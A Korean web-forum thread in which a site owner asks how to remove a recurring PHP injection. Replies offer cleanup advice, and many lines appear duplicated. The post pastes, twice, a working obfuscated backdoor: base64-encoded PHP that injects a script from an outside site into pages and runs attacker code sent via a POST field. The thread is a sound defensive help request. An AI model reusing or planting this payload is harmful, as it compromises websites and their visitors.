해킹코드 이거 어찌 제거 해야 하는지요? 정보
해킹코드 이거 어찌 제거 해야 하는지요?본문
제 테스트계정이 해킹을 당해 파일을 일일이 수정하다 안되어서 계정을 초기화하고 그누를 다시설치했습니다...
그런데 오늘 접속해보니 또 같은 해킹코드가 들어 있네요....
ftp,db.비번 모두 변경하였구요....
pc바이러스 검사에도 이상이 없었거든요....답답해 미치겠네요....
아래는 해킹코드입니다...
어찌해야 되는지 답변 부탁드리겠습니다.
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnaWd5bicpKXtmdW5jdGlvbiBpZ3luKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJ4cGJHeGhiR2xoYlM1elpTOW1hV3h0WlhJdmFXNWtaWGd1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGlneW4yKCRhLCRiLCRjLCRkKXtnbG9iYWwkaWd5bjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGlneW4xKSljYWxsX3VzZXJfZnVuYygkaWd5bjEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2lneW4nKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdpZ3luJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGlneW5sPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdpZ3luMicpKSE9J2lneW4yJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
그런데 오늘 접속해보니 또 같은 해킹코드가 들어 있네요....
ftp,db.비번 모두 변경하였구요....
pc바이러스 검사에도 이상이 없었거든요....답답해 미치겠네요....
아래는 해킹코드입니다...
어찌해야 되는지 답변 부탁드리겠습니다.
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnaWd5bicpKXtmdW5jdGlvbiBpZ3luKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJ4cGJHeGhiR2xoYlM1elpTOW1hV3h0WlhJdmFXNWtaWGd1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGlneW4yKCRhLCRiLCRjLCRkKXtnbG9iYWwkaWd5bjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGlneW4xKSljYWxsX3VzZXJfZnVuYygkaWd5bjEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2lneW4nKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdpZ3luJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGlneW5sPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdpZ3luMicpKSE9J2lneW4yJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
댓글 전체
음...
이거 알약으로는 안잡히구요 avast 백신 사용을 추천해 드립니다.
그리고 감염된 피씨는 하드밀고 새로 까는게 좋다라고 합니다.
감염된 피씨에서 비번 변경하고 ftp 접속해도 결국 코드들이 자동 삽입됩니다.
주로 .html 파일이나 .js 파일들이 변경이되고 변종도 많아서 참 골치 아픕니다.
우선 감염피씨부터 정리하고 서버 계정 비번들 변경하시길..
이거 알약으로는 안잡히구요 avast 백신 사용을 추천해 드립니다.
그리고 감염된 피씨는 하드밀고 새로 까는게 좋다라고 합니다.
감염된 피씨에서 비번 변경하고 ftp 접속해도 결국 코드들이 자동 삽입됩니다.
주로 .html 파일이나 .js 파일들이 변경이되고 변종도 많아서 참 골치 아픕니다.
우선 감염피씨부터 정리하고 서버 계정 비번들 변경하시길..
요즘 여기저기 중국발 좀비넘들의
유명한 ftp게정 비번 알아서 index.html에 코드입력하는겁니다
일단 고마쓰님 말씀처럼 본인PC부터 바이러스 잡으시는게 우선입니다
바이러스 걸린 컴퓨터에서 백날 비번을 변경해봤자죠 ㅡㅡ;
그리고 위의 코드 PHP로 무슨의미에요?
위의코드자체가 위험한건가요?
백지로 뜨던뎅 ㅡㅡ;
유명한 ftp게정 비번 알아서 index.html에 코드입력하는겁니다
일단 고마쓰님 말씀처럼 본인PC부터 바이러스 잡으시는게 우선입니다
바이러스 걸린 컴퓨터에서 백날 비번을 변경해봤자죠 ㅡㅡ;
그리고 위의 코드 PHP로 무슨의미에요?
위의코드자체가 위험한건가요?
백지로 뜨던뎅 ㅡㅡ;
페이지 확인 결과 해당 URL은 아무런 스크립트도 없습니다.
그러나 지속적으로 위와 같은 코드가 삽입된다면 서버측 또는 관리자측에 문제가 있는겁니다.
관리자측 악성코드 검사, 서버측 아이디/비밀번호 변경과 권한 조정으로 막으시길 바랍니다.
그러나 지속적으로 위와 같은 코드가 삽입된다면 서버측 또는 관리자측에 문제가 있는겁니다.
관리자측 악성코드 검사, 서버측 아이디/비밀번호 변경과 권한 조정으로 막으시길 바랍니다.
<script src=xxxxxhttpxx://lillaliam.se/filmer/index.php ></script> 라고 들어있네요.
임시방편으로 head.sub.php 파일에
function igyn($s){
$a = false;
}
이렇게 넣으면 동작은 안하겠네요.
임시방편으로 head.sub.php 파일에
function igyn($s){
$a = false;
}
이렇게 넣으면 동작은 안하겠네요.
답변감사합니다...
이거 아주 골치 아프네요..
이거 아주 골치 아프네요..
